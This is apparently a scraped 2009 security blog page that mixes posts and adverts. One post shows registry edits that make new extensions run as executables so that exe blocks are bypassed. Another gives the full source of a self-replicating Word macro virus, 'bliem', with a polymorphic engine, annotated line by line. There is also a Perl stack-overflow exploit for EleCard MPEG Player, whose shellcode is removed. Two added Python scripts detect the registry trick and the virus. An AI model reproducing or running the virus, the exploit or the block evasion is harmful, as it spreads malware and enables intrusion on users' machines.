As we know, Windows only recognizes a handful of file types as executable: exe, com, scr and pif. What if we want to create a new executable extension, for example ext (so that a file named Anti.ext behaves exactly like Anti.exe)? The use of this technique is to get around a block on exe, scr and com files. If an exe file such as msconfig.exe is blocked because of its exe extension, we can still run msconfig by changing its extension, for example to msconfig.ext.

Doing this is very easy: we only need to add a new key to the registry. For example, to make the new extension behave like an exe file, the .reg file to import is:


Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\.EVA]
@="exefile"

So the general format is:
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\.EKSTENSIBARU]
@="exefile"
with @="exefile" making the extension behave like an exe file, or @="scrfile" making it behave like an scr file.


To behave like a com file, the PersistentHandler key must also be added to the .reg file. This technique can also be used by a virus as a defence mechanism on the computer, namely by:

1. Changing the handling of a harmless file type, for example binding jpg to exefile, while the virus file attaches itself to (joins with) the real jpg file without changing the file's extension; the real jpg images are meanwhile given a different extension, for example tmp.

2. Disguising itself as a file that looks harmless, so that it is hard to detect; for example, a virus using the extension d11, which at first sight looks like dll, etc.

Note:

To change the icon of, for example, an scr file that uses its own embedded icon, so that the scr file uses an external icon (for example a Windows system icon) without recompiling the scr file, we need to change the registry value at the key:

[HKEY_CLASSES_ROOT\SCRFILE]
namely the DefaultIcon value, from %1 to, for example: %SystemRoot%\System32\Shell32.dll,-154
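As an added example (not part of the original post), the following Python script reads a .reg export of HKEY_CLASSES_ROOT and flags extension keys whose default value is an executable ProgID but which are not one of Windows' stock executable extensions, i.e. exactly the kind of key the .reg file above creates or the jpg-to-exefile binding described in point 1. The sample export embedded in it is constructed for the example, and the export text is assumed to be already decoded (reg.exe writes UTF-16).

```python
"""Audit a .reg export of HKEY_CLASSES_ROOT for rogue executable extensions (added example)."""
import re
from typing import Dict, List, Tuple

# ProgIDs whose open verb runs the file as a program.
EXECUTABLE_PROGIDS = {"exefile", "comfile", "scrfile", "piffile", "batfile", "cmdfile"}

# Extensions that Windows itself maps to those ProgIDs; any other extension is suspicious.
EXPECTED = {
    ".exe": "exefile", ".com": "comfile", ".scr": "scrfile",
    ".pif": "piffile", ".bat": "batfile", ".cmd": "cmdfile",
}

# Matches "[HKEY_CLASSES_ROOT\.ext]" including the stray spaces seen in hand-written files.
KEY_RE = re.compile(r"^\[\s*(HKEY_CLASSES_ROOT|HKCR)\\(\.[^\\\]]+)\s*\]$", re.IGNORECASE)
# Matches the key's default value line, @="...".
DEFAULT_RE = re.compile(r'^@\s*=\s*"(.*)"\s*$')


def parse_extension_defaults(reg_text: str) -> Dict[str, str]:
    """Return {extension: default ProgID} for every HKCR\\.ext key in the export."""
    mapping: Dict[str, str] = {}
    current = None
    for raw in reg_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        key = KEY_RE.match(line)
        if key:
            current = key.group(2).lower()
            continue
        if line.startswith("["):      # some other key: stop attributing values to the extension
            current = None
            continue
        default = DEFAULT_RE.match(line)
        if default and current is not None:
            mapping[current] = default.group(1).strip().lower()
    return mapping


def find_rogue_executable_extensions(reg_text: str) -> List[Tuple[str, str]]:
    """Extensions handled as executables that are not a stock Windows executable type."""
    rogue = []
    for ext, progid in sorted(parse_extension_defaults(reg_text).items()):
        if progid in EXECUTABLE_PROGIDS and EXPECTED.get(ext) != progid:
            rogue.append((ext, progid))
    return rogue


# Constructed sample export: a normal .exe key, the .EVA key from the post above,
# a .jpg key rebound to exefile, and a harmless .txt key.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\.exe]
@="exefile"
"Content Type"="application/x-msdownload"

[HKEY_CLASSES_ROOT\.EVA]
@="exefile"

[HKEY_CLASSES_ROOT\.jpg]
@="exefile"

[HKEY_CLASSES_ROOT\.txt]
@="txtfile"

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"%1\" %*"
"""

if __name__ == "__main__":
    for ext, progid in find_rogue_executable_extensions(SAMPLE_REG):
        print(f"suspicious extension {ext} is handled as {progid}")
```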




Anti Keylogger  

Monday, February 2, 2009

The threat: Keyloggers as means of stealing information.

Information stealing has existed since the early days of the World Wide Web. Unfortunately, various kinds of white-collar crime aimed at stealing valuable (in the direct sense) information thrive in cyberspace. The scale of these crimes varies from harvesting email addresses for spammers to identity theft and espionage.

Since the Internet has become a part of daily life and business, the rapid growth of cybercrime endangers the whole of society. Information-stealing software certainly facilitates these crimes, sometimes being the only instrument a thief needs to commit them.

Real protection starts with identifying the threat.


One of the most effective ways of stealing information is capturing keystrokes. A small, fairly simple program (a programmer can write a plain one in a couple of days) captures everything the user is doing - keystrokes, mouse clicks, files opened and closed, sites visited. Slightly more sophisticated programs of this kind also capture text from windows and take screenshots (recording everything displayed on the screen), so the information is captured even if the user doesn't type anything and just opens and views a file. These programs are called keylogging programs (keyloggers, key loggers, keystroke loggers, key recorders, key trappers, key capture programs, etc.). They form the most dangerous core of so-called spyware.

Old keyloggers become obsolete. New keyloggers appear all the time. Existing keylogging programs are constantly modernized. It is extremely likely that several keyloggers are being written at this very moment.

Means of defense: Anti-spyware, anti-viruses and personal firewalls

Experts recommend using a combination of three products: a personal firewall, an anti-virus and an anti-spyware, and regularly updating the latter two. However, even in this case a computer won't be 100% secure against keyloggers. Why?

Most anti-spy and anti-virus products, whatever their names and whatever their advertising says, apply the same scheme: pattern matching. These programs scan the system, looking for code that matches signatures - pieces of spyware code, which are kept in so-called signature bases. These products can protect from spyware which has already been detected and studied before. This approach makes anti-spyware developers inevitably lag behind spyware writers. Without frequent updating, anti-spy products lose their efficiency very quickly. This becomes very risky because the PC owner still relies on his anti-spy or anti-virus.

Unfortunately, no signature base is complete enough to guarantee total protection. Even if the base is updated regularly, if a spyware signature is not included there, the anti-spy software is helpless against it. Anti-spies do not recognize a brand-new spyware product for some time - until its signature is included in the bases and users update their anti-spies. There are also kinds of spy software whose signatures are unlikely to be included in any signature base. For example, spy software can be developed by government organizations for their own purposes. Some commercial, especially corporate, monitoring products are very rarely included in signature bases, though many of them can well be used for spying as well.

Another case is when there is only one copy of a spy program. It doesn't take too long for a good programmer to write one. Spyware, just like clothes, can be "tailor-made". Hackers often take the source code of spy software from the Internet, change it a bit and then compile something new, which no signature base will recognize.

When a keylogging module is part of a virus, it can cause lots of trouble, because several hours or even days will pass before it is included in signature bases.

A problem with a personal firewall is that it asks too many questions. Even an experienced user can answer them incorrectly and allow some information-stealing program or module to do its job. For example, some commercial monitoring programs use the processes of programs that already have Internet access (browsers, mail clients, etc.). As a result, if the anti-virus overlooks a keylogger, valuable information can be stolen and sent via the Internet to the address specified by the hacker (or some other person).

Anti-keylogger™ is a dedicated anti-keylogging product. Unlike most other anti-spyware, Anti-keylogger doesn't depend on signature bases - simply because it doesn't use them. Its newly developed solutions and algorithms allow it to spot the behavior of a spy program - and disable it instantly.

Anti-keylogger™ can protect against even "custom-made" software keyloggers, which are extremely dangerous - and very popular with cybercriminals.

Anti-keylogger™ is very user-friendly. It runs in the background, quite transparently for the user. It won't ask you needless questions, nor will it distract you from your work.

Easy-to-use and reliable, Anti-keylogger™ will guard your privacy and guarantee that all your confidential information remains secret.


The polymorphic engine for VBA  

This engine is a combination of both a class infector and a polymorphic engine. The whole thing is called 'bliem', like the virus I first used this engine in. Let's say something about the technique...

The worst thing about the already existing polymorphic engines for VBA was that they always inserted the code at the same lines, or the volume of the source code grew and grew and... So 'bliem' doesn't have such problems. The main good thing in 'bliem' is that it always 'keeps an eye' on the actual size of the source code and reduces it when it's too big. Let's say something about the technique of inserting the junk code: the junk code is not inserted into the virus code in the common way. The junk code is inserted during infection. This means that the whole virus code is stored in arrays and the junk code is stored in some of these arrays. Just as the main code is stored there, the junk code is also there and will be inserted while infecting the new class object. While inserting the actual code into arrays, the 'bliem brain' checks its own actual size and if it's too big, it deletes some junk arrays. I use this method because the old one with the command '.deletelines' only screwed up the code.

To make 'bliem' work you have to insert a comment sign ( ' ) at the end of every code line. 'bliem' uses this to find the junk code in the normal virus code. Without these signs the virus and the polymorphic engine won't work.

So 'bliem' is infector and polymorphic engine in one, so don't wonder about the code. If you have any questions or whatever, feel free to mail me!

!This is only the distribution code. The original code uses shorter variable names!

Private Sub document_open() '
Dim virus(150): virus(1) = "bliem": Options.VirusProtection = (Rnd * 0) '
Set ho = MacroContainer.VBProject: Set hos = ho.VBComponents(1) '
Set host = hos.CodeModule: Set skip = NormalTemplate: this = Chr(39) '
Set newhost = skip.VBProject.VBComponents(1).CodeModule '
For y = 1 To Int(75 - (Rnd * 20)): vx = vx & Chr(255 - Int(Rnd * 100)): Next y '
vcode = "Private Sub document_close()" & this & vx & vbCr '
If MacroContainer = NormalTemplate Then '
Set skip = ActiveDocument '
Set newhost = skip.VBProject.VBComponents(1).CodeModule '
vcode = "Sub document_open()" & this & vx & vbCr '
End If: Randomize: lines_ = host.countoflines '
For i = 2 To lines_ '
junkcode = "" '
dis = Int(Rnd * 3) '
pos = InStr(host.Lines(i, 1), this) '
If pos = 0 Then GoTo end_ '
If pos = 2 And lines_ > 100 Then '
virus(i) = "": dis = 1: GoTo next_ '
End If '
virus(i) = Left(host.Lines(i, 1), (pos - 1)) '
For j = 1 To Int(75 - (Rnd * 20)) '
junkcode = junkcode & Chr(255 - Int(Rnd * 100)) '
Next j '
virus(i) = virus(i) & this & junkcode '
If dis = 2 Then virus(i) = virus(i) & vbCr & Chr(32) & this & junkcode '
vcode = vcode & virus(i) & vbCr '
next_: '
Next i '
end_: '
If newhost.countoflines < 2 Then '
newhost.AddFromString vcode '
skip.Save '
End If '
End Sub '
If Day(Now()) = 31 Then msbox virus(1) '
Rem Another virus by Jack Twoflower [LineZer0 & Metaphase] '
Rem Uses "bliem" polymorhic engine by Jack Twoflower '

I'll walk now through the code...

> Attention. The whole engine needs this " ' " signs after every
> line of code.

Private Sub document_open() '
Dim virus(150): virus(1) = "bliem": Options.VirusProtection = (Rnd * 0) '

> Dim the arrays. We need about 150 because the whole virus
> code will be stored in this array. Turn off VirusProtection...

Set ho = MacroContainer.VBProject: Set hos = ho.VBComponents(1) '
Set host = hos.CodeModule: Set skip = NormalTemplate: this = Chr(39) '

> Set here our current host

For y = 1 To Int(75 - (Rnd * 20)): vx = vx & Chr(255 - Int(Rnd * 100)): Next y '

> Create junk code for the engine

vcode = "Private Sub document_close()" & this & vx & vbCr '

> This will be our first line of code...

If MacroContainer = NormalTemplate Then '
Set skip = ActiveDocument '
vcode = "Sub document_open()" & this & vx & vbCr '
End If: Randomize: lines_ = host.countoflines '

> If we are here in the Normaltemplate then exchange the hosts.

Set newhost = skip.VBProject.VBComponents(1).CodeModule '

> Set the new host

For i = 2 To lines_ '

> Here the 'brain' of the engine starts...

junkcode = "" '

> Clear the variable every loop

dis = Int(Rnd * 3) '

> Generate a random number for the engine

pos = InStr(host.Lines(i, 1), this) '

> Get the position of the " ' " character in every line...

If pos = 0 Then GoTo end_ '

> If there is no such sign goto end...

If pos = 2 And lines_ > 100 Then '

> The following code gets active if the size of the whole
> code is growing too big...it cuts the junkcode line out
> of the normal code...

virus(i) = "": dis = 1: GoTo next_ '

> Clear this variable and goto next loop

End If '
virus(i) = Left(host.Lines(i, 1), (pos - 1)) '

> If the size is not too big, copy the normal code without
> the junkcode into the arrays...

For j = 1 To Int(75 - (Rnd * 20)) '
junkcode = junkcode & Chr(255 - Int(Rnd * 100)) '
Next j '

> Generate junkcode again...

virus(i) = virus(i) & this & junkcode '

> Add the junkcode...

If dis = 2 Then virus(i) = virus(i) & vbCr & Chr(32) & this & junkcode '

> If the 'dis' integer is 2 then add some junkcode lines into our code...

vcode = vcode & virus(i) & vbCr '

> Add the whole code into 'vcode'

next_: '
Next i '

> Play it again Sam!

end_: '
If newhost.countoflines < 2 Then '

> If there are 0 or 1 lines in our newhost...

newhost.AddFromString vcode '

> infect it...

skip.Save '

> and save it...

End If '
If Day(Now()) = 31 Then msbox virus(1) '

> little payload...

End Sub '
Rem Another virus by jack twoflower [LineZer0 & Metaphase] '
Rem Uses "bliem" polymorhic engine by jack twoflower '

ref. VX Heavens
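As an added example (not part of the original post or of the engine's code), here is a Python scanner that looks for the trait the engine relies on rather than for the virus code itself: a trailing comment on nearly every line made of 55 to 75 characters in the Chr(156) to Chr(255) range, plus the filler lines that consist only of a space, a comment sign and more junk (the dis = 2 case in the listing). The clean and mutated sample macros inside it are constructed for the example.

```python
"""Flag VBA modules whose lines end in high-byte junk comments (added example)."""
import random
from typing import Dict, List, Tuple


def split_trailing_comment(line: str) -> Tuple[str, str]:
    """Split a VBA line at the first apostrophe that is outside a string literal."""
    in_string = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_string = not in_string  # a doubled "" toggles twice, so this stays correct
        elif ch == "'" and not in_string:
            return line[:i], line[i + 1:]
    return line, ""


def is_junk_comment(comment: str, min_len: int = 40, high_ratio: float = 0.9) -> bool:
    """True when the comment is long and almost entirely characters above ASCII."""
    if len(comment) < min_len:
        return False
    high = sum(1 for ch in comment if ord(ch) > 127)
    return high / len(comment) >= high_ratio


def scan_vba(source: str) -> Dict[str, object]:
    """Count junk-comment lines in one module and give a verdict."""
    lines = [ln for ln in source.splitlines() if ln.strip()]
    junk = [ln for ln in lines if is_junk_comment(split_trailing_comment(ln)[1])]
    # Filler lines carry no code before the comment sign.
    filler = [ln for ln in junk if not split_trailing_comment(ln)[0].strip()]
    ratio = len(junk) / len(lines) if lines else 0.0
    return {
        "lines": len(lines),
        "junk_comment_lines": len(junk),
        "filler_lines": len(filler),
        "ratio": ratio,
        "suspicious": ratio >= 0.5,
    }


def _junk(rng: random.Random) -> str:
    """Constructed junk in the engine's range: Chr(255 - Int(Rnd * 100)), 55 to 75 of them."""
    return "".join(chr(255 - rng.randrange(100)) for _ in range(rng.randrange(55, 76)))


def make_samples(seed: int = 7) -> Tuple[str, str]:
    """Return (clean macro, constructed bliem-style macro) for demonstration."""
    rng = random.Random(seed)
    clean = "\n".join([
        "Sub AutoOpen()",
        "    MsgBox \"It's a normal macro\" ' greet the user",
        "End Sub",
    ])
    mutated: List[str] = []
    for code in ["Private Sub document_open()", "Dim v(150): v(1) = \"x\"", "End Sub"]:
        mutated.append(code + " '" + _junk(rng))   # every code line gets a junk comment
        mutated.append(" '" + _junk(rng))          # plus a filler line of junk only
    return clean, "\n".join(mutated)


if __name__ == "__main__":
    for name, text in zip(("clean", "mutated"), make_samples()):
        print(name, scan_vba(text))
```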


Acunetix Web Vulnerability Scanner  

Monday, January 26, 2009

Why You Need To Secure Your Web Applications

Website security is possibly today's most overlooked aspect of securing the enterprise and should be a priority in any organization.

Increasingly, hackers are concentrating their efforts on web-based applications – shopping carts, forms, login pages, dynamic content, etc. Accessible 24/7 from anywhere in the world, insecure web applications provide easy access to backend corporate databases and also allow hackers to perform illegal activities using the attacked sites. A victim's website can be used to launch criminal activities such as hosting phishing sites or to transfer illicit content, while abusing the website's bandwidth and making its owner liable for these unlawful acts.

Hackers already have a wide repertoire of attacks that they regularly launch against organizations, including SQL Injection, Cross Site Scripting, Directory Traversal Attacks, Parameter Manipulation (e.g., URL, Cookie, HTTP headers, HTML Forms), Authentication Attacks, Directory Enumeration and other exploits. Moreover, the hacker community is very close-knit; newly discovered web application intrusions are posted on a number of forums and websites known only to members of that exclusive group. Postings are updated daily and are used to propagate and facilitate further hacking.

Web applications – shopping carts, forms, login pages, dynamic content, and other bespoke applications – are designed to allow your website visitors to retrieve and submit dynamic content including varying levels of personal and sensitive data.

If these web applications are not secure, then your entire database of sensitive information is at serious risk. A Gartner Group study reveals that 75% of cyber attacks are done at the web application level.


Why does this happen?

· Websites and related web applications must be available 24 hours a day, 7 days a week to provide the required service to customers, employees, suppliers and other stakeholders.
· Firewalls and SSL provide no protection against web application hacking, simply because access to the website has to be made public.
· Web applications often have direct access to backend data such as customer databases and, hence, control valuable data and are much more difficult to secure.
· Most web applications are custom-made and, therefore, involve a lesser degree of testing than off-the-shelf software. Consequently, custom applications are more susceptible to attack.

Various high-profile hacking attacks have proven that web application security remains the most critical. If your web applications are compromised, hackers will have complete access to your backend data even though your firewall is configured correctly and your operating system and applications are patched repeatedly.

Network security defenses provide no protection against web application attacks, since these are launched on port 80 (the default for websites), which has to remain open to allow regular operation of the business.

For the most comprehensive security strategy, it is therefore imperative that you regularly and consistently audit your web applications for exploitable vulnerabilities.


EleCard MPEG PLAYER (.m3u file) Local Stack Overflow Exploit  

#!/usr/bin/perl
# By ALpHaNiX
# NullArea.Net
# THanks
#EAX 00000000
#ECX 41414141
#EDX 775A104D
#EBX 00000000
#ESP 0012C280
#EBP 0012C2A0
#ESI 00000000
#EDI 00000000
#EIP 41414141

system("color 5");

if (@ARGV != 1) { &help; exit(); }

sub help(){
print "[X] Usage : ./exploit.pl filename \n";
}

{ $file = $ARGV[0]; }
print "\n [X]*************************************************\n";
print " [X]EleCard MPEG PLAYER Local Stack Overflow Exploit *\n";
print " [X] Coded By AlpHaNiX *\n";
print " [X] From Null Area [NullArea.Net] *\n";
print " [X]**************************************************\n\n";

print "[+] Exploiting.....\n" ;

my $buff="http://"."\x41" x 969 ;
my $nop ="\x90" x 6000 ;
my $ret ="\xB3\x37\x8D\x6E" ; # JMP ESP In DDRAW.Dll In Windows Vista Ultimate English

# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com
my $shellcode = "" ; # encoded bind-shell payload blob removed from this listing

my $exploit = $buff.$ret.$nop.$shellcode;
print "[+] Creating Evil File" ;
open(blah, ">>$file") or die "Cannot open $file";
print blah $exploit;
close(blah);
print "\n[+] Please wait while creating $file";
print "\n[+] $file has been created";

Reference: milw0rm.com [2009-01-25]


Kaspersky Anti-Virus 2009  

Monday, January 5, 2009

Kaspersky Anti-Virus 2009 – the backbone of your PC’s security system, offering protection from a range of IT threats.

Kaspersky Anti-Virus 2009 provides the basic tools needed to protect your PC.
